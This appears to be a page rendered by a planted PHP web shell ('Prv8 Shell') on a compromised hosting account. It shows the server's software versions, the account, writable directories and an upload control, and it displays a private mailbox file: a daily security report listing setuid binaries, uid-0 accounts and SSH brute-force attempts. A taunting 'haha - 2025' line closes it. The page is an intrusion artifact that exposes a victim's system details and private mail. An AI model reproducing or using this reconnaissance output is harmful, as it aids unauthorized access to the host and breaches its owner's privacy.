Prv8 Shell
Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
System : Linux server.jackjohnson.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
User : jackjohn ( 502)
PHP Version : 5.3.17
Disable Function : NONE
Directory :  /home/jackjohn/mail/.jackjohnson@jackjohnson_com/cur/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/jackjohn/mail/.jackjohnson@jackjohnson_com/cur/1349317088.000691.mbox:2,
Return-Path: <root@jackjohnson.nethosting.com>
Received: from jackjohnson.nethosting.com (localhost [127.0.0.1])
	by jackjohnson.nethosting.com (8.13.6.20060614/8.13.6) with ESMTP id l4396aIZ057146
	for <root@jackjohnson.nethosting.com>; Thu, 3 May 2007 03:06:36 -0600 (MDT)
Received: (from root@localhost)
	by jackjohnson.nethosting.com (8.13.6.20060614/8.13.6/Submit) id l4396aex057104
	for root; Thu, 3 May 2007 03:06:36 -0600 (MDT)
Date: Thu, 3 May 2007 03:06:36 -0600 (MDT)
From: Charlie Root <root@jackjohnson.nethosting.com>
Message-Id: <200705030906.l4396aex057104@jackjohnson.nethosting.com>
To: root@jackjohnson.nethosting.com
Subject: jackjohnson.nethosting.com security run output


Checking setuid files and devices:
find: /backup: No such file or directory
find: /backup: No such file or directory

jackjohnson.nethosting.com setuid diffs:
--- /var/log/setuid.today	Wed Apr 25 03:07:16 2007
+++ /tmp/security.VeI4DquM	Thu May  3 03:06:34 2007
@@ -1,11 +1,3 @@
-124664331 -r-sr-xr-x  1 man   wheel    33152 Mar 12 11:24:42 2007 /backup/usr/local/bin/jman
-124664368 -rwxr-sr-x  1 root  mail     12784 Nov 17 18:17:16 2005 /backup/usr/local/bin/lockfile
-124664413 -rwxr-sr-x  1 root  mail      7668 Jan  3 09:10:32 2007 /backup/usr/local/bin/muttng_dotlock
-124664700 -rwsr-sr-x  1 root  mail     74140 Nov 17 18:17:16 2005 /backup/usr/local/bin/procmail
-124664757 -rws--x--x  1 root  wheel   949226 Nov 14 15:32:22 2005 /backup/usr/local/bin/sperl5.8.7
-124664766 ---s--x--x  2 root  wheel    93244 Feb 15 16:20:17 2006 /backup/usr/local/bin/sudo
-124664766 ---s--x--x  2 root  wheel    93244 Feb 15 16:20:17 2006 /backup/usr/local/bin/sudoedit
-124956217 -rwx--s--x  1 root  mail     12499 Nov 18 10:34:50 2005 /backup/usr/local/libexec/mlock
 124242811 -r-sr-xr-x  1 root  wheel      18332 Nov  3 01:10:07 2005 /bin/rcp
 124373523 -r-sr-xr-x  1 root  wheel      22528 Nov 18 08:57:07 2005 /sbin/ping
 124373524 -r-sr-xr-x  1 root  wheel      30696 Sep 20 14:15:21 2006 /sbin/ping6

jackjohnson.nethosting.com changes in mounted filesystems:
--- /var/log/mount.today	Wed Mar  7 03:04:37 2007
+++ /tmp/security.FZ9D5GAG	Thu May  3 03:06:35 2007
@@ -3,4 +3,4 @@
 devfs	/dev	devfs rw	0 0
 procfs	/proc	procfs rw	0 0
 /dev/aacd0s1d	/ports	ufs ro	0 0
-/dev/aacd1s1e	/backup	ufs ro	0 0
+/dev/aacd0s1a	/backup	ufs ro	0 0

Checking for uids of 0:
root 0
toor 0

Checking for passwordless accounts:

jackjohnson.nethosting.com login failures:
May  2 03:36:46 jackjohnson sshd[73195]: Failed password for invalid user test from 208.123.79.12 port 47925 ssh2
May  2 03:36:48 jackjohnson sshd[73200]: Failed password for invalid user test from 208.123.79.12 port 48023 ssh2
May  2 03:36:49 jackjohnson sshd[73205]: Failed password for invalid user test from 208.123.79.12 port 48150 ssh2
May  2 03:36:50 jackjohnson sshd[73212]: Failed password for invalid user test from 208.123.79.12 port 48254 ssh2
May  2 03:36:52 jackjohnson sshd[73216]: Failed password for invalid user test from 208.123.79.12 port 48341 ssh2
May  2 09:56:33 jackjohnson sshd[16157]: Failed password for invalid user user from 157.100.1.49 port 41102 ssh2
May  2 09:56:37 jackjohnson sshd[16178]: Failed password for invalid user oracle from 157.100.1.49 port 41510 ssh2
May  2 09:56:47 jackjohnson sshd[16208]: Failed password for invalid user backup from 157.100.1.49 port 41973 ssh2
May  2 09:56:49 jackjohnson sshd[16314]: Failed password for invalid user temp from 157.100.1.49 port 43130 ssh2
May  2 09:56:54 jackjohnson sshd[16331]: Failed password for invalid user admin from 157.100.1.49 port 43449 ssh2
May  2 16:09:26 jackjohnson sshd[84413]: Failed password for root from 80.86.200.230 port 46896 ssh2
May  2 16:09:26 jackjohnson sshd[84414]: Failed password for root from 80.86.200.230 port 46900 ssh2
May  2 16:09:28 jackjohnson sshd[84469]: Failed password for root from 80.86.200.230 port 47111 ssh2
May  2 16:09:28 jackjohnson sshd[84467]: Failed password for root from 80.86.200.230 port 47107 ssh2
May  2 16:43:06 jackjohnson sshd[89699]: Failed password for root from 80.86.200.230 port 46859 ssh2
May  2 16:43:07 jackjohnson sshd[89759]: Failed password for root from 80.86.200.230 port 47384 ssh2
May  2 16:43:27 jackjohnson sshd[89864]: Failed password for root from 80.86.200.230 port 50706 ssh2
May  2 16:43:29 jackjohnson sshd[89886]: Failed password for root from 80.86.200.230 port 50876 ssh2
May  2 19:36:37 jackjohnson sshd[11148]: Failed password for invalid user test from 218.1.65.233 port 52796 ssh2
May  2 19:36:39 jackjohnson sshd[11178]: Failed password for invalid user guest from 218.1.65.233 port 53019 ssh2
May  2 19:36:41 jackjohnson sshd[11202]: Failed password for invalid user admin from 218.1.65.233 port 53110 ssh2
May  2 19:36:43 jackjohnson sshd[11219]: Failed password for invalid user admin from 218.1.65.233 port 53197 ssh2
May  2 19:36:45 jackjohnson sshd[11240]: Failed password for invalid user user from 218.1.65.233 port 53281 ssh2

jackjohnson.nethosting.com refused connections:

-- End of security output --

haha - 2025